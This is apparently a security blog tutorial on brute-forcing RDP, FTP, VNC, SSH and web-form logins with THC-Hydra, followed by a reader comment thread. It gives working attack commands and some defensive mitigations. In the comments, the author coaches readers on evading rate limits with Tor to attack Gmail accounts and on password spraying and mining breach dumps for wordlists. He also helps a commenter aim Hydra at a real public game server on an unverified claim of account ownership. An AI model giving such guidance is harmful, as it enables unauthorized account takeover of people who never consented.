Brute Forcing Passwords with THC-Hydra

What is THC-Hydra?

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. THC (The Hackers Choice) created Hydra for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Installing THC-Hydra

If you are running Kali Linux you will already have a version of Hydra installed, for all other Debian based Linux operating systems download from the repository by using.

sudo apt-get install hydra

or you can download the latest version from THC’s public GitHub development repository https://github.com/vanhauser-thc/thc-hydra

Start by using git to clone the GitHub repository.

git clone https://github.com/vanhauser-thc/thc-hydra

next change into the thc-hydra directory.

cd thc-hydra

now just type.

./configure

then…

make

and then.

sudo make install

Hydra-GTK

Hydra GTK is a GUI front end for hydra, as this is a GUI for hydra you do have to have THC-hydra already installed. I f you are running Kali Linux this will already be pre-installed for everyone else you can install it by typing.

sudo apt-get install hydra-gtk

Once installed you will have a new application called xHydra, open this up and you should see a window that looks like this.

To check out the latest information about Hydra-GTK project over on their GitHub page https://github.com/vanhauser-thc/thc-hydra/tree/master/hydra-gtk

If you already downloaded hydra from THC’s GitHub repository you also download the latest version of Hydra-GTK.

Within the thc-hydra folder, you downloaded from THCs GitHub earlier, you should see a folder called  hydra-gtx

cd hydra-gtk/

Before I could compile the source code I had to have the gtk2.0 dependency installed

sudo apt-get install gtk2.0

Once installed I was able to compile the source code as normal.

./configure
make
sudo make install

THC-Hydra’s Help File

Once you have Hydra installed, you can check out its help file by typing hydra -h .

hydra -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
 -R restore a previous aborted/crashed session
 -I ignore an existing restore file (dont wait 10 seconds)
 -S perform an SSL connect
 -s PORT if the service is on a different default port, define it here
 -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
 -p PASS or -P FILE try password PASS, or load several passwords from FILE
 -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
 -y disable use of symbols in bruteforce, see above
 -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
 -u loop around users, not passwords (effective! implied with -x)
 -C FILE colon separated "login:pass" format, instead of -L/-P options
 -M FILE list of servers to attack, one entry per line, ':' to specify port
 -o FILE write found login/password pairs to FILE instead of stdout
 -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
 -t TASKS run TASKS number of connects in parallel per target (default: 16)
 -T TASKS run TASKS connects in parallel overall (for -M, default: 64)
 -w / -W TIME waittime for responses (32) / between connects per thread (0)
 -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
 -v / -V / -d verbose mode / show login+pass for each attempt / debug mode 
 -O use old SSL v2 and v3
 -q do not print messages about connection errors
 -U service module usage details
 server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
 service the service to crack (see below for supported protocols)
 OPT some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: postgres sapr3 firebird afp ncp ssh sshkey svn oracle mysql5 and regex support.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)
 % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
 % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
 % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
 hydra -l user -P passlist.txt ftp://192.168.0.1
 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
 hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
 hydra -l admin -p password ftp://[192.168.0.0/24]/
 hydra -L logins.txt -P pws.txt -M targets.txt ssh

Brute Force \Dictionary Attack

Hydra can use either a dictionary based attack, where you give Hydra an explicit list of words for it to try or a brute Force attack which will try every single possible combination of letters each one has its benefits and drawbacks.

Dictionary Attack will use a precompiled list of words or word list, this will speed up the cracking process over brute force because the program will only run through each word in the wordlist but if the word is not in said word list your attack will fail.

If you are running Kali you will already have a whole bunch of word lists for you to use, just type locate wordlist in a terminal to find their location.

For everyone else not running Kali, you can download some good word lists from SkullSecurity.org password wiki, look for the rockyou.txt as this is what I will be using in my examples below.

If this was a targeted attack against someone you could use something like CUPP (Common User Passwords Profiler) to create a wordlist more specific to the target. It takes birthday, nickname, address, a name of pet, etc. Enter the details you know or what you can find out via social media and it will create a wordlist based on your inputs.

Brute Force will crack a password by trying every possible combination of the password so, for example, it will try aaaa then aaab, aaac, aaae . This quite considerably increases the time the attack takes but reduces the likeliness of the attack to fail.

In hydra, you can use the -x to enable the brute force options. Brute force options have its own help file which you can get to by typing hydra -x -h.

hydra -x -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
             valid CHARSET values are: 'a' for lowercase letters,
             'A' for uppercase letters, '1' for numbers, and for all others,
             just add their real representation.
  -y         disable the use if the above letters as placeholders

Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-
   -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and 1 only

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/

RDP

To set the scene I have a Windows 2012 server with Remote Desktop setup, running in my virtual lab. The virtual machine has an IP of 192.168.34.16 and one user called administrator.

So lets fire up hydra with our rockyou word list and run this command

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16

-t 4 This sets the number of tasks that can run parallel together in this example I have used 4 which will send 4 logins at a time. RDP does not like too many connections at the same time so try and keep it at a maximum of 4. It is sometimes worth adding a -w to your command to add a wait between attempts.
-V – Verbose this shows you which usernames and passwords on screen as it’s working.
-f  Quits once you have found a positive Username and Password match.
-l administrator – Use the username administrator to attempt to login.
-P rockyou.txt– This is the word list that we will be pulling passwords from.
rdp://192.168.34.16 – This is the service we want to attack and the IP address.

You should see each attempt as it tries to connect to RDP like pictured below, as we have used the -f command hydra will stop once it has found a positive match.

In Event Viewer on the Windows 2012 server with RDP enabled you will see lots of Event ID 4625 in the security logs. As you can see below this gives away a lot of information to the system admin where the brute force has come from.

If you are the admin of the server who’s RDP is getting brute forced, you can mitigate this by changing the default port RDP listens on or if you have a router that allows you to transpose ports this is probably the better option.

If you’re interested in changing the port RDP listens on in a Windows PC start by opening the registry editor (Regedit).

Then locate the following registry sub key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\PortNumber

On the Edit menu, click Modify, and then click Decimal

Type the new port number, and then click OK

Quit the Registry Editor.

Then Restart the Computer.

Once the computer restarts you will be able to connect to it using Remote Desktop Connection as normal but you now need to add a colon (:) then the new port at the end of the address like pictured below.

Another option is to restrict RDP access by telling the windows firewall which IP’s are allowed to connect to the RDP port and which are not. I have already done a tutorial on this check that out here

FTP

Using the same Windows 2012 server I used for the RDP brute force above I installed the latest version of FileZilla Server, which can be downloaded from their website https://filezilla-project.org/

I’m not going to go into the ins and outs of setting up FileZilla server there are plenty of guides for that just google it, just know that I setup this FTP server for one user called admin with a password of P@ssw0rd

Then I run this hydra command in the terminal, notice I have used a capital -L in this command. This specifies a word list which contains a list of usernames. use a lowercase l if you want to specify a single username.

hydra -t 5 -V -f -L userlist -P passwordlist ftp://192.168.34.16

-t 5 this sets the number of tasks or logins it will try simultaneously. I have gone for 5 here but just remember don’t go too high as it may give you false results.
-V Verbose this will display the login and password it tries in the terminal for each attempt/
-f Quits once hydra has found a positive Username and Password match.
-L userlist The capital -L  here means I’m using a wordlist of usernames called userlist if a -l was used this specifies a single username to try.
-P passwordlist The capital -P here means I’m using a word list called passwordlist if a -p was used this specifies a single password to try.
ftp://192.168.34.16 This is the service we want to attack and the IP address of the FTP server

You will see each attempt as it try’s all the specified username and password combinations until it either finds a match or it or runs out of combinations.

As you can see below every attempt is logged in the FileZilla console you can also see all 5 login tasks running at the bottom simultaneously.

.

Within FileZilla, you can enable auto ban to stop a hacker brute forcing the username and password of the FTP. When enabled this blocks the IP address which the hacker is using to login from after a specified amount of failed logins, the default is 10.

Interestingly hydra just continued to try passwords even though my IP was banned it went through the whole username and password list and said nothing in the list matched even though I know the username and password were on that list.

VNC

I have installed VNC server on the Linux mint box on 192.168.100.155 running in my virtual lab then added a password of P@ssw0rd to the VNC server, I have a quick run down on how to set this up in Mint below.

apt-get install vnc4server
vncpasswd
Password:P@ssw0rd
Verify:P@ssword
vncserver

In the past, VNC has been a very insecure program due to having no login name and any password could be set and it does not have to meet any complexity requirements that being said in the newer versions they have added a blacklist feature that will block you after 5 failed login attempts.

So for our brute force to work, I have had to switch off the blacklisting feature by running this command on the Linux Mint box.

vncconfig -display :1 -set BlacklistTimeout=0 -set BlacklistThreshold=1000000

This will stop me from blacklisting myself in my test lab, on a live engagement I would suggest increasing the wait time per try in hydra (-W ) to anything over 60 and if you are attacking an older version of VNC this blacklisting feature is not enabled by default.

Also as a little side note don’t use more than 4 tasks (-t 4) in your command as you may find it gives you some false negatives and remember there is no username on VNC connections so we won’t need the -l in our command.

After you have turned off the blacklisting feature run this command in hydra.

hydra -P passwordlist -t 1 -w 5 -f -s 5901 192.168.100.155 vnc -v

-P passwordlist The capital -P here means I’m using a word list called passwordlist if a -p was used this specifies a single password to try.
-t 1 This sets the number of tasks or logins it will try simultaneously. I have gone for 1 here but just remember don’t go higher than 4 for brute forcing VNC.
-w 5 This sets the wait time between tries I have gone for 5 here but remember to go a lot higher if the blacklisting feature is still enabled
-f Quits once hydra has found a positive Password match.
-s 5901 This changes the default port for hydra to connect to the VNC server from 5900 to 5901 which was what my VNC server defaulted to.
192.168.100.155 vnc This specifies the IP address of the VNC server and the service we want to attack.
-v Verbose this will display the password it tries in the terminal for each attempt.

Once the command is run you should see an output like this.

As I said above VNC passwords are notably weak. you should never run a VNC server directly over the internet The blacklist time-out feature prevents some brute forcing of the passwords but if you hit the server slow enough not to get blacklisted it can still be brute-forced.

Instead, you should run VNC server on 127.0.0.1 by adding -localhost to the command line:

vncserver -localhost

then use SSH tunnelling to link a port on your machine to the port on the server.

ssh -L 5901:localhost:5901 user@<ServerIP>

Then while that SSH connection is alive, you can connect your VNC client to the port 5901 on your machine.

If you want more information about SSH tunnelling check out my tutorial all about SSH here

Just before I finish up with brute forcing VNC you can find the VNC logs in a hidden folder called .vnc in your home folder. The contents of this log will look something like the text below points 1: and 2: you can see hydra trying the wrong password and point 3: is where the password was correct, interestingly it does not seem to give the IP address of the pc I am using to brute force it.

1:SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40744 (Authentication failure)
 2: Connections: accepted: 0.0.0.0::40746
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40746 (Authentication failure)
 3: Connections: accepted: 0.0.0.0::40748
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 VNCSConnST: Server default pixel format depth 16 (16bpp) little-endian rgb565
 Connections: closed: 0.0.0.0::40748 (Clean disconnection)
 SMsgWriter: framebuffer updates 0
 SMsgWriter: raw bytes equivalent 0, compression ratio -nan

SSH

To set the scene here I have got Linux Mint running in my virtual lab on 192,168.100.155 with SSH installed, On the Linux Mint box, I created a user called admin with a password of P@ssword.

I have already done a tutorial on setting up Linux Mint in Virtual Box here

also I have a guide on installing SSH in Linux check out this tutorial here

Ok, so now we have our virtual machine with SSH running on it. we can use this command in Hydra to start brute forcing the SSH login.

hydra -l admin -P passwordlist ssh://192.168.100.155 -V

-l admin The small l here states that I am going to specify a username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
ssh://192.168.100.155 This is the service we want to attack and the IP address of the SSH server.
-V Verbose this will display the login and password it tries in the terminal for each attempt.

Once you run this command you should see all the attempts in the terminal like pictured below, notice where I have not added -t in the command the number of simultaneous logins will be 16 which is the default.

If you are interested, SSH logs access attempts in the /var/log/auth.log

To make this log a bit easier on the eyes you can use the Linux tail command to display the last x number of lines of your auth.log.

Use the following command to view 100 last lines of your SSH log.

tail -100 /var/log/auth.log | grep 'sshd'

To stop someone from brute forcing your SSH password you can turn off Password authentication altogether and enable SSH key authentication. If you are interested in setting up SSH key authentication check out my tutorial on SSH.

Webpage Login

Now, this is where things start to get fun, you can use hydra to brute force webpage logins. To get this to work you need to get some information about the login page like if its a post or a get request before you can construct your command in hydra.

The website login I am going to brute force is the DVWA (Damn Vulnerable Web App) which if you have already taken a look at my tutorial on Setting up a Vulnerable LAMP Server will already have setup and will be ready to go.

Also, you are going to need to have installed some sort of proxy to capture and identify the key parameters of the web login page so we can create our command in hydra. I will be using the Firefox plugin called Tamper Data but you can just as easily use Burp Suite.

The Tamper Data Firefox plugin can be downloaded from https://addons.mozilla.org/en-GB/firefox/addon/tamper-data/

—————Edit: 24th January 2019———————

Tamper Data now no longer works with the latest version of Firefox, check out my new tutorial Brute Forcing Web Logins with DVWA for the same tutorial below but using Burp Suite to capture the requests.

——————————————————————————

So to start, open up DVWA website in your browser “in my lab I go to http://192.168.100.155/dvwa” and login to the DVWA site with the default credentials of admin /password

You can brute force this main login page but it’s a little bit more advanced than what I want to get into here.

Once logged in, go down to DVWA Security button on the left-hand side of the page and make sure the security Level is set to low.

Once the security is set to low click the Brute Force button on the menu on the left-hand side.

This is the login page we are going to brute force.

Start by firing up Tamper Data, I normally do this in Firefox by hitting the alt key on the keyboard and selecting it from the Tools menu.

Now Tamper Data is open click Start Tamper and it will proxy all your Firefox traffic through Tamper Data allowing us to capture the login request.

Now go back to DVWA and enter any old username and password and click Login. Tamper Data will capture the login request and ask you if you want to tamper with it, just click submit.

Go back to Tamper Data and right click the first GET request captured and click copy.

Next, Open up any text editor and paste every thing that we copied from Tamper Data this should look something like this

We have now just got to take note of the message that the DVWA website spits back at us to tell us we have entered a wrong username and password.

We now have everything to construct our hydra command against this login page.

The command should look something like this below notice that all this information was gathered from Tamper Data and the only part that will be different on yours is the part after PHPSESSID=.

hydra 192.168.100.155 -V -l admin -P passwordlist http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low"

192.168.100.155 The target IP address of the server hosting the webpage
-V Verbose this will display the login and password it tries in the terminal for each attempt.
-l admin The small l here states that I am going to specify a username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
http-get-form Tells hydra that you are going to be using the http-get-form module.
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login All these details were found in our tamper data request that we copied to our text editor.
F=Username and/or password incorrect. This is the failed login message we received from the DVWA login page, this tells hydra when it’s not received we have a valid login.
H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low This is the Cookie we were issued when we logged into the DVWA site at the start also found in the Tamper Data.

If you get an error like pictured below, where it gives you more than one valid password. It means that you have not constructed the command right and probably just need to check that the syntax is correct.

Normally it’s either the PHPSESSID is wrong or the failed logon message is not formatted correctly.

If you want more information on the hydra’s http-get-form command, take a look at Hydra’s http-get-form help page by typing hydra http-get-form -U in your terminal.

Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax: <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
with usernames and passwords being replaced in the "^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by "F=", successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri to define a different page to gather initial cookies from
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
All colons that are not option separators should be escaped (see the examples above and below).
You can specify a header without escaping the colons, but that way you will not be able to put colons
in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
"/login.php:user=^USER^&pass=^PASS^:incorrect"
"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
"/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

That’s all I’m going to do for now on brute forcing Passwords with THC-Hydra. If there are any more you would like me to show you or you have some feed back for me please leave a comment below.

Hemp

IT and security Expert with 20+ Years of Experience. _______________________________________________________ With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

52 thoughts on “Brute Forcing Passwords with THC-Hydra

    1. Hi Marko Thanks for the comment.

      Get and POST requests are quite similar and if you know how it works with GET you should not have a problem changing the command to http-post-form.

      If you need more information check out Hydra’s help module for http-post-form by typing hydra http-post-form -U into your terminal.

  1. Hi,
    Very nice post and very useful. I have a doubt. I have got the same error as you shown in the last screen shot. “1 of 1 target successfully completed, 12 valid passwords found”.
    I am not sure what is wrong in the command i tried in 2 different ways, both time i have same error

    hydra -l admin -P C:\cirt\wordslist-sample\wordslist.txt 192.168.254.132 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.”

    hydra.exe 192.168.254.132 -l admin -P C:\cirt\wordslist-sample\wordslist.txt http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=b4o3p65d7fr6jkfcafa0v9qhm2”

    Can you please help.

    1. Hi Jeff

      Sure, I can help, Hydra can be a right pain to get working right.

      Using your previous example, change the last part of the command that I have highlighted to look like this..

      hydra.exe 192.168.254.132 -l admin -P C:\cirt\wordslist-sample\wordslist.txt http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=b4o3p65d7fr6jkfcafa0v9qhm2; security=low"

  2. Hello,

    I have been working on an adapter running Linux. I know the user name, however I forgotten the password. So, I have been using hydra 8.6 off of the latest Kali release and I am not getting the response I think I should be getting.

    My command: hydra -s 23 -v -V 4:10:aA1!@#$%^&*()_+ -t16 -m 192.168.15.38 telnet

    Note: I have verified I can ping, telnet to the IP address

    The result: It gives me an [ATTEMPT] 16 times, then [ERROR] signal 15.. then [STATUS]… writes to a restore file…

  3. Hello,

    I am hoping you maybe able to help! I have a Linux adapter I am working with and have forgotten the password. I know the user name! I was working with my recent version of Kali and hydra (8..6) and noted this might be a good test/use for the tool.

    I have issue the command: hydra -s 23 -v -V -l user -x 4:10:aA1!@#$%^&*()_+ -t16 -m 192.168.15.38 telnet

    The result: It gives me 16 [ATTEMPT] then shows an [ERROR], writes to a restore file and then proceeds to [STATUS] with no attempts. I do not think this is right. Do you have any suggestions?

    Note: I have double checked I can ping the adapter and telnet to it (and it does not support SSL or FTP). -Thanks in advance

    1. Hi DT thanks for posting your comments above..

      The only thing I can think of is maybe your smashing the telnet session with too many tasks at once, try dropping the number down to 5 and try again lose the -s 23 as Hydra already knows its port 23 because you have added the command telnet on the end.

      hydra -V -t 5 -l user -x 4:10:aA1!@#$%^&*()_+ -m 192.168.15.38 telnet

      hemp

      1. Hemp,

        Thanks for the idea’s! I am going back to the lab to try again. I will post a result when I return.

        Regards

  4. Hemp,

    Thanks for the idea’s! I ran the modified command you passed to me and the system returned a segmentation error. I re-examined the man pages and I went option by option. After about a dozen tries… I got it to work, I ended up dropping the wait to 1 (-w 1). Another parameter in which I found different… it liked -s 23 (for telnet) instead to IP_ADD:23 or IP_ADD telnet.

    I appreciate the insight to the wait variable.

    Regards -DT

    1. Hey DT thanks for letting me know.
      Hydra can be quite fussy on how you structure your command, a lot of the time you need to just adjust the -w wait and -t tasks for your command its worth starting low say -t 5 and keep increasing this until you start getting errors as by default this is set to 16.

      Hemp

  5. Hi, I don’t want to access the actual website that the password is to, I am just trying to crack it so I know what it is. Is there a simpler way of using the GUI to just brute force (I know this person uses pretty random passwords with various character types) this password? I also noticed that all the passwords from this particular dump started with $2a$08$… is that something that I should leave out or keep in when attempting to ultimately crack.

    1. Hi Jason, thanks for your comment…

      It all depends on what you are trying to brute force but you should be able to use the hydra GUI just the same as the command line.

      That password hash you specified ($2a$08$)is part of a bcrypt hash, which to be truthful is going to be really hard to brute force and probably worth looking into other avenues to get the information you need.

      Hemp

      1. thank you hemp.

        What other methods do you suggest I use? I can’t use social engineering or trojans or anything like that. So I def have to crack it… And I think the password is probably pretty complex… rainbow tables or something?

        1. I think unless you’re a government agency there is no feasible way to crack it…

          but you might have a fighting chance if you have £10,000 password cracking rig and hashcat but even this process will take probably 4 years to crack and by that point they may have already changed it to something else and the costs to run a rig for that amount of time would be paranormal.

          How comes you are after the password so bad?

          Just remember the password is only the key to the gate there is always other options to climb over the defences…

          Hemp

  6. CAN SOME ONE TYPE THE COMMAND LINE FOR G MAIL SOME ONE HACKED MY GMAIL IM STILL LOGED ON BUT THEY CHANGED MY PW AND TOOK OFF MY REOCVERY EMAIL SCARED TO LOG OUT NEED TO GRAB THE MORONS PW REVERT BACK TO MY SELF I DONT KNOW THE COMAND FOR IT

    1. Hi Perry

      My personal advice for your predicament is to speak to Gmail support and see if they can help you out, more than likely you have used the same username and password elsewhere on the internet and that’s how your account has been compromised. you can check this by going to https://haveibeenpwned.com/

      You can’t really use hydra alone to brute force a Gmail account as after 5 failed logins your IP will be blocked…

      You really need to run Hydra through a web proxy or Tor to change your IP address every couple of mins.

      Hemp

  7. I feel really sory to say that but hydra is the only tool in kali linux and of all git repository that i treat seriosly.
    I ve no idea what the gemail-hack exists for
    Even a child knows that it does not work
    On one condiction if your paswd is in save function i mean if it is remembered and saved by your ps the gemail does not hack gmail but your own pc
    Best regards
    Waiting for a short reply

    1. Hi Barlomiej thanks for your comment.

      The Problem with trying to hack Gmail accounts is after 5 tries your IP will get blocked. what you need to do is proxy your connection through something like tor and switch your IP every try or couple of tries, also the account will get blocked if you smash the hell out of it so make sure you are password spraying “lots of user names against a single password”.

      another thing to look out for, is the address you are try to hack on any hacked database list https://haveibeenpwned.com/ download the database and check what the user had typed in and adjust your wordlist accordingly.

      let me know how you get on

      Hemp

  8. I have already username & password & IP of device yet. How command of Hydra I can use to find Cisco Enable Password or MD5 hash of it?
    Tks very much.

    1. Hi Vinh

      I have never had to run hydra against anything using Cisco Enabled before but I’m sure the command would be something like

      “hydra -l username -P password_file cisco-enable://Targetname”

      there actually might be more info if you check out hydras help file by typing hydra -h in your terminal.

      Let me know how you get on??

      Hemp

  9. Is it possible to make syntax so it uses 3 known fields and 1 password. For example let’s say web form looks like this:
    Username:
    Pin:
    Area(drop down input):
    Password:

    I know username, pin and area. How would syntax look like in this example(if at all possible) to only bruteforce password?

  10. Thank you so much for the write up. It’s fantastic! I’ve been looking for a good tutorial on http-post/get-fourm for hydra and yours is the most detailed i’ve found. I understand the concept 100% now, vs just being a script kiddie and pasting commands you find online.(which I was guilty of a couple years ago…but thats how everyone learns right?) I’ve been doing lots of CTFs and sometimes get held back by messing up the proper forum and would always get errors. Knowing what the placeholders are and their purpose , and breaking down the post/get request from burpsuite or other proxy is what I was missing….

    1. Thanks Lazy Jay for taking the time to leave such a nice comment, its always nice to receive feedback.

      If there ever is anything else you would like me cover in more detail, leave me comment and ill create a tutorial about it.

      Hemp

  11. Hello
    I ran your example but the hydra give this error:
    [ERROR] Compiled without LIBSSH v0.4.x support, module is not available!
    What should i do?
    Thanks

    1. Hi John

      I actually ran into this complining hydra as well..

      apt-get the libssh packages
      cd into/hydra/dir
      sudo ./configure clean
      sudo ./configure
      sudo make
      sudo make install

      your hydra should now have libssh support.

      let me know if you still having problems

      hemp

  12. Hello!
    I would like to know, how THC Hydra could work with login and password field that change each new request?

    Kind regards,
    Thiago

    1. Hi Proodyr

      Thanks for your comment,

      Yes you can bruteforce Teamspeak with hydra.

      Try some thing like hydra -l superadmin -P PasswordFile.txt -s 9002 -v 192.168.22.139 teamspeak

      but in the newer version, teamspeak has a option to ban your IP after x amount of failed logins..

      hemp

  13. Hello Hemp,

    Really Nice Article. Appreciate the work you put on. Nice Explanations. May be you could post some more examples on http-form-post with hydra.

  14. I know the username and password just testing it out and its saying the first password is the correct one when its not, it isnt even finishing the other passwords check.

    hydra -t 4 -V -f -l cracker000 -P C:\Users\joe\Desktop\passwords.txt (IP) https-post-form “/ HTTP/1.1:username=^USER^&password=^PASS^:F=Login failed”

    1. Hi Joe

      Thanks for your comment.

      I do not think the syntax of your command is correct.

      you don’t have a IP address or domain name plus this in bold is wrong / HTTP/1.1:username=^USER^&password=^PASS^:F=Login failed”.

      If you would like me to help further please post your captured request in the comments and i can help you structure the command.

      Hemp

  15. Well this is the full command i type
    hydra -t 4 -V -f -l cracker000 -P “C:\Users\Joe\Desktop\passwords.txt” 69.164.211.252 https-post-form “/game.eoserv.net:username=^USER^&password=^PASS^&Login=Login:F=Login Failed.:H=Cookie: PHPSESSID=jav8tc5rj7iul6ik69fkqd25og; security=low”

    and when it runs this is what it says
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-22 23:45:10
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 13 login tries (l:1/p:13), ~4 tries per task
    [DATA] attacking http-post-forms://69.164.211.252:443/game.eoserv.net:username=^USER^&password=^PASS^&Login=Login:F=Login Failed.:H=Cookie: PHPSESSID=jav8tc5rj7iul6ik69fkqd25og; security=low
    [ATTEMPT] target 69.164.211.252 – login “cracker000” – pass “password1” – 1 of 13 [child 0] (0/0)
    [ATTEMPT] target 69.164.211.252 – login “cracker000” – pass “methoda2” – 2 of 13 [child 1] (0/0)
    [ATTEMPT] target 69.164.211.252 – login “cracker000” – pass “joe45” – 3 of 13 [child 2] (0/0)
    [ATTEMPT] target 69.164.211.252 – login “cracker000” – pass “jackson32” – 4 of 13 [child 3] (0/0)
    [STATUS] 4.00 tries/min, 4 tries in 00:01h, 9 to do in 00:03h, 4 active
    and it just stays like that

    I lost my account and im just trying to get it back but its not working

      1. I get get this
        POST / HTTP/1.1
        Host: game.eoserv.net
        Connection: close
        Content-Length: 56
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Origin: https://game.eoserv.net
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Referer: https://game.eoserv.net/
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Cookie: PHPSESSID=5rvktnjqgb2e9qfr4licuremoi

        csrf=1643232762&action=login&username=dfdf&password=dfdf

        1. Hi Joe

          Ok i think i know what your issue is, everything you are typing is correct but there is a CSRF Token which probably changes with every password request.

          hydra cant do this by itself, you either need to use hydra with burp so that burp can capture the CSRF Token or just use burp on its own. However, if your using the community edition of burp the amount of simultaneous threads is limited so might take a long time depending on your wordlist.

          another third option is to write something yourself check out the High Security heading on my tutorial on Brute Forcing Web Logins with DVWA. This covers writing a brute force script which collects the csrf token using python.

          let me know how you get on??
          Hemp 🙂

